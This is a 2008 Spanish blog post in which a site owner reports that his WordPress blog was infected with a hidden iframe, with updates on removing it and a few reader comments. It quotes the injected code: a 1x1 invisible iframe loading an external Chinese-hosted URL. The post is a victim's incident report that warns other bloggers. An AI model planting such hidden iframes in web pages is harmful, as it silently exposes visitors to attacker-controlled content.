Entre Códigos


El blog de Rubén Cantón

Reflexiones de un cerebro en fuga y artículos sobre posicionamiento, e-marketing, usabilidad y otros tecnicismos.

greyimg

Inyección de iframe en Wordpress

Escrito por Ruben Cantón el Tuesday, 15 de July del 2008
Más del mismo tema: blog, blogosfera, informatica, internet, taller

Este lunes me percaté de que el Blog tenía algún problema, concretamente, tardaba mucho en cargar e incluso a veces provocaba el cierre de mi explorador Firefox 3.0. Me di cuenta de que al entrar a mi Blog Firefox se ponía a realizar peticiones a la página de MSN y tras revisar si era mi PC, mi versión de Firefox, algún complemento o el último plugin que instalé hace poco mas de una semana, conseguí encontrar un iframe bastante bien oculto al final del body:

<iframe src='http://onlinestat.cn/cgi-bin/index.cgi?qwopl'
width='1' height='1' style='visibility: hidden;'>

Buscando por Google me encuentro con que Anieto ya se encontró un problema parecido hace unos meses, aunque tras leer por los foros de ayuda de wordpress veo que el problema era distinto (el iframe se escondía en un trozo de código diferente).

Parece ser que últimamente está de moda la inyección de código en las webs ajenas, sobretodo por temas de Blak Hat SEO, aunque en mi caso, teniendo en cuenta que está haciendo peticiones a la web de MSN mas bien parece un intento de tumbarle la página a Microsoft (seguimos con los infantilismos…).

Sigo investigando el suceso, ya que hasta el momento no conozco dónde se encuentra esa puerta abierta y de poco me serviría buscar por la BD dónde han insertado eso, pero cuelgo esto aquí para avisar a quienes tengan un Blog en wordpress y para ver si alguien sabe cuál es la solución.

Actualización: De momento he conseguido quitar el iframe “reinstalando” Wordpress (básicamente he subido la versión que tengo en mi PC local al servidor y tras sobreescribir todos los archivos parece que he limpiado el hack).

No obstante, la puerta sigue abierta…

Actualización 2: Siguen metiéndome el iframe, esta vez lo han colocado en la cabecera editando el header.php del template, y no tardan mucho en darse cuenta y reponerlo… tendré que hacer un análisis más profundo por si algún plugin hizo de “troyano” y ha abierto alguna puerta o si actualizando a la nueva versión se arregla el problema.

Actualización 3: Encontré el código en un módulo externo a wordpress pero necesario para mi blog, el módulo en php que hace el rewrite de las páginas, tras limpiarlo he reinstalado todo y cambiado permisos y contraseñas y de momento la cosa funciona…

Ya hay 4 comentarios. ¡Falta el tuyo!

Opciones: Feed de estos comentarios y trackback

Escríbe aquí tu opinión

Nombre (necesario)

Email (no se mostrará)

Web (opcional)

mygif
1. Sebastardo
August 16th, 2008 at 11:19 pm

Y? Pudiste arreglarlo??

mygif
2. Ruben Cantón
October 15th, 2008 at 1:25 am

Si, finalmente eso bastó, aunque si fue capaz de modificar mi archivo de rewrite de alguna manera tenía acceso a mi hosting a través del FTP o alguna cosa.

Reinstalé todo y cambié cuentas y contraseñas, es posible que lo hiciera a través de WP, o que se colase gracias a WP, pero creo que de alguna manera consiguió los datos de acceso.

Un saludo.

mygif
3. Ananda
July 5th, 2009 at 2:42 pm

Hola amigo. Mira te diré que estando alojado en el servidor de interdominios.com puedes esperar cualquier cosa. Yo estuve infectada constantemente por ataques iframes miestras estuve con ellos. Acabe haaaartaaa!! Siempre tenia algo. Hasta que cambié de hosting. Muerto el perro, se acabó la rabia. Esta gente son lo peor amigo, y no es mi intención hacer publicidad de dondes estoy ahora ni mucho menos, pero si decir que interdominios.com son una auténtica “”piiiiiiiiiii…..

Pingback y Trackback

Pingback y trackback de varios blogs:
El blog jodido gracias a un iframe « Psycho Side
March 4th, 2010 at 3:31 am

[...] Entre Códigos [...]

¿Quieres más?

Temas del blog

Busca por Entre Códigos

 

Últimos comentarios

Últimos artículos

Lo más comentado

Blogroll

Mis proyectos